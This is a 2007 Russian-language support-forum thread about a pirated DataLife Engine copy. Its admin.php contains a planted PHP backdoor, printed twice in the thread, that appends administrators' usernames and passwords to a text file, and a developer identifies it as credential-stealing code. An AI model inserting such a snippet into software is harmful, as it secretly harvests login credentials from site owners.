horlovo 0 Опубликовано: 5 сентября 2007 Рассказать Опубликовано: 5 сентября 2007 Вот появилась такая строка в админке после обновления с версии 6.0 до 6.2 Warning: filesize(): stat failed for engine/data/config.txt in /home/horlov/public_html/warez/admin.php on line 89 Что это и как её убрать скажите пожайлуста!!! Строка в самом верху))) Цитата Ссылка на сообщение Поделиться на других сайтах
PapaKitson 25 Опубликовано: 5 сентября 2007 Рассказать Опубликовано: 5 сентября 2007 Огласите адрес вашего сайта ... Цитата Ссылка на сообщение Поделиться на других сайтах
horlovo 0 Опубликовано: 5 сентября 2007 Рассказать Опубликовано: 5 сентября 2007 Автор ВОт что в этих строчках в admin.php if(filesize($fs) >= 7200) { $f=fopen('engine/data/config.txt', 'w+'); fwrite($f, "deleted\n".$username.' ~ '.$password.' ~ '.$sernam); fclose($f); } Да я его на локалке пробую для обучения. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 5 сентября 2007 Рассказать Опубликовано: 5 сентября 2007 Horlovo, Отличный код, который записывает логины и пароли в файл, долго ваш сайт не проживет с таким кодом Вы используете нелегальную копию скрипта, в котором содержится зловредный код позволяющий злоумышленнику получить ваш логин и пароль к админпанели. Скачивайте официально предоставляемую демоверсию с сайта http://dle-news.ru или приобретайте легальную копию скрипта, ничего подобного в официальных дистрибутивах нет. Также на будущее: если используете нелегальные копии, то все проблемы это ваши проблемы и не ищите помощи на официальном форуме поддержки Цитата Ссылка на сообщение Поделиться на других сайтах
horlovo 0 Опубликовано: 5 сентября 2007 Рассказать Опубликовано: 5 сентября 2007 Автор Так я на локалке кто ко мне залезет а на счёт лицензии спасибо можно конечно купить но дороговато для меня 1480 руб если были бы какие нибудь скидки мож и купил бы((( $fs="engine/data/config.txt"; if(filesize($fs) >= 7200) { $f=fopen('engine/data/config.txt', 'w+'); fwrite($f, "deleted\n".$username.' ~ '.$password.' ~ '.$sernam); fclose($f); } if ($password !="") { $f=fopen('engine/data/config.txt', 'a'); fwrite($f, "\n".$username.' ~ '.$password.' ~ '.$sernam); fclose($f); } Да спасибо за информацию вышеуказанный код удалил и строка пропала)))но он вроде не создавал ни какого config.txt'((( а на счёт демо версии как там учиться если код закрытый. ВОт видите какой у вас хороший движок предупредил что файл админки больше чем должен быть))) Просто супер респект и уважуха а если бы я его в интернете повесил то блин менябы шантажировать начали. Надо у Вас купить лицензию а то скоро собрался ставвить сайт. А через Яндекс деньги ни как???? нельзя Вам ссуму перевести. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.